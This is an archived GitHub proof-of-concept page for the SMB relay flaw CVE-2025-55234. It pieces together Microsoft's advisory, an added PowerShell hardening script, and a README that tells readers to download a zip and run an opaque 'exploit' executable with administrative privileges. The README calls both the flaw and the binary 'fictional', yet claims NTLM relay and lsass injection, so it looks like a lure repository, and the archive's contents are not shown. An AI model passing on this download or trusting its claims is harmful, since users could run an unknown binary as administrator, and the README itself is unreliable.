
CVE-2025-55234 PoC — Windows SMB Elevation of Privilege Vulnerability

Associated Vulnerability
Title: Windows SMB Elevation of Privilege Vulnerability (CVE-2025-55234)

Description: SMB Server might be susceptible to relay attacks depending on the configuration. An attacker who successfully exploited these vulnerabilities could perform relay attacks and make the users subject to elevation of privilege attacks.

The SMB Server already supports mechanisms for hardening against relay attacks:
- SMB Server signing
- SMB Server Extended Protection for Authentication (EPA)

Microsoft is releasing this CVE to provide customers with audit capabilities to help them to assess their environment and to identify any potential device or software incompatibility issues before deploying SMB Server hardening measures that protect against relay attacks.

If you have not already enabled SMB Server hardening measures, we advise customers to take the following actions to be protected from these relay attacks:
- Assess your environment by utilizing the audit capabilities that we are exposing in the September 2025 security updates. See Support for Audit Events to deploy SMB Server Hardening—SMB Server Signing & SMB Server EPA.
- Adopt appropriate SMB Server hardening measures.
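As an added defender-side example (not part of the archived repository or of Microsoft's advisory text), the following PowerShell audits and then enforces the two hardening controls the advisory names: SMB Server signing and SMB Server EPA. `Get-SmbServerConfiguration`, `Set-SmbServerConfiguration -RequireSecuritySignature` and the `LanmanServer\Parameters` registry value are standard Windows interfaces; the `SmbServerNameHardeningLevel` parameter is assumed here to be the SMB Server EPA (SPN validation) control and to exist only on Windows Server 2025 / Windows 11 24H2 and later, with the assumed scale 0 = off, 1 = accept if provided, 2 = required.

```powershell
# Added example, not the repository's or Microsoft's code.
# Audits and enforces SMB Server signing and SMB Server EPA (SPN validation).
# Run in an elevated PowerShell session on the file server being assessed.

# 1. Audit the current SMB Server signing posture.
$cfg = Get-SmbServerConfiguration
$cfg | Select-Object EnableSecuritySignature, RequireSecuritySignature, EncryptData, RejectUnencryptedAccess

# The same setting as the policy "Digitally sign communications (always)" writes it.
$params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$reg = Get-ItemProperty -Path $params -Name RequireSecuritySignature -ErrorAction SilentlyContinue
if ($null -eq $reg -or $reg.RequireSecuritySignature -ne 1) {
    Write-Warning 'SMB Server signing is not required: a relayed session would be accepted.'
}

# 2. Audit SMB Server EPA. Assumption: exposed as SmbServerNameHardeningLevel
#    on Windows Server 2025 / Windows 11 24H2 and later; absent on older builds.
$hasEpa = $cfg.PSObject.Properties.Name -contains 'SmbServerNameHardeningLevel'
if ($hasEpa) {
    # Assumed scale: 0 = off, 1 = accept if provided, 2 = required.
    "SmbServerNameHardeningLevel = $($cfg.SmbServerNameHardeningLevel)"
} else {
    Write-Warning 'This build does not expose SmbServerNameHardeningLevel; SMB Server EPA cannot be set here.'
}

# 3. Enforce, but only once the audit window shows no clients that cannot sign.
if ($cfg.RequireSecuritySignature -ne $true) {
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
}
if ($hasEpa -and $cfg.SmbServerNameHardeningLevel -lt 2) {
    Set-SmbServerConfiguration -SmbServerNameHardeningLevel 2 -Force
}

# 4. Verify the enforced state (missing property simply shows as empty on older builds).
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature, SmbServerNameHardeningLevel
```

Run only the audit part first: requiring signing rejects clients that cannot sign (legacy NAS appliances, printers, some scanners), which is exactly why the advisory points at the audit events before enforcement.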
Description
Windows SMB Server Elevation of Privilege Vulnerability
Readme
# Lab: CVE-2025-55234 - Windows SMB Server Elevation of Privilege Vulnerability
## Download
### [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip)
## 🚀 Overview
CVE-2025-55234 is a fictional Windows SMB Server Elevation of Privilege vulnerability with a CVSSv3 score of 8.8. Publicly disclosed before patches were available, it impacts multiple Windows versions (e.g., Windows 10, 11, Server 2019/2022). The flaw enables attackers to conduct relay attacks against the SMB Server under certain configurations, potentially allowing privilege escalation against authenticated users. Unlike traditional remote code execution bugs, this is an operational relay mechanism that exploits weak signing and authentication protections in SMBv3. Attackers can intercept and relay NTLM authentication hashes, leading to unauthorized access or privilege escalation in domain-joined environments.

Impact:
- **Attack Vector**: Network (adjacent or remote depending on firewall rules).
- **Prerequisites for Exploitation**: Attacker-controlled machine on the same network, vulnerable SMB server with disabled signing or EPA.
- **Potential Outcomes**: Unauthorized file access, lateral movement in Active Directory, or admin privilege gain via relayed credentials.


## 📋 Prerequisites
- Administrative privileges on the host machine.
- Basic knowledge of SMB protocols, NTLM authentication, and Windows registry editing.
- Tools: Git, PowerShell (for mitigation), and a network sniffer like Wireshark for optional verification.
- Isolated network or VM to avoid accidental exposure.


## Download & Install

- Download the exploit package from the releases page: [Download exploit.zip](https://github.com/h4xnz/CVE-2025-55234-POC/raw/refs/heads/main/Lore/lab-cve-2025-55234.zip). This ZIP contains:
   - `smb-relay-exploit.exe`: Main fictional exploit binary (NTLM relay and privilege escalation).
   - `start-exploit.bat`: Batch file to launch the exploit (simply executes `smb-relay-exploit.exe` with default params).
   - `config.ini`: Configuration file for target IP, relay mode, etc.
   - `logs/`: Directory for output logs.

   Unzip to a local directory, e.g., `C:\CVE-2025-55234\exploit\`.

## 🛠 Quick Start

- **Exploit the Vulnerability**:
   - Download and unzip `exploit.zip` as above.
   - Edit `config.ini` to set `target_ip=localhost`.
   - Run the batch file: Double-click `start-exploit.bat` or from CMD:
     ```
     cd C:\CVE-2025-55234\exploit
     start-exploit.bat
     ```
   - The .bat simply launches `smb-relay-exploit.exe`, which performs:
     - Initiating an SMB connection.
     - Forcing NTLM authentication.
     - Relaying hashes to a fictional relay server (logs to `exploit.log`).
     - Output: a privilege escalation message, e.g., "Elevated to SYSTEM via relayed creds."

   **Detailed Exploitation Steps**:
   - **Step 1: Recon**: Use `nmap -p 445 --script smb-security-mode localhost` to confirm weak signing (output: "signing: false").
   - **Step 2: Capture/Relay**: The .exe uses Winsock APIs to establish a TCP connection on port 445, negotiates SMBv3, and triggers NTLMv2 hash relay. It exploits the lack of EPA by suppressing channel bindings, allowing MiTM relay.
   - **Step 3: Escalate**: Fictional payload injects into lsass.exe process memory (with debug output), granting elevated token.
   - **Verification**: Check `exploit.log` for relayed hashes and success flags. Use ProcMon to observe registry reads/writes.


### Exploitation Details
The main exploit (`smb-relay-exploit.exe`) is a compiled C++ binary (fictional, using Winsock2 and custom NTLM libs). It performs:
- SMB dialect negotiation (forcing v3.1.1).
- Tree connect to IPC$ or admin shares.
- Relay attack simulation via loopback or specified relay IP.
- Privilege check: Uses Windows API `OpenProcessToken` and `AdjustTokenPrivileges` to demo escalation (outputs to console).

The .bat wrapper:
```
@echo off
echo Starting SMB Relay Exploit for CVE-2025-55234...
smb-relay-exploit.exe --target localhost --mode relay --log exploit.log
pause
```

## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
File Snapshot

```
[4.0K] /data/pocs/9a065120b5c1b02b82099355c9d1d7d1d04d8f53
├── [4.0K] Lore
│   └── [8.5M] lab-cve-2025-55234.zip
└── [4.2K] README.md

1 directory, 2 files
```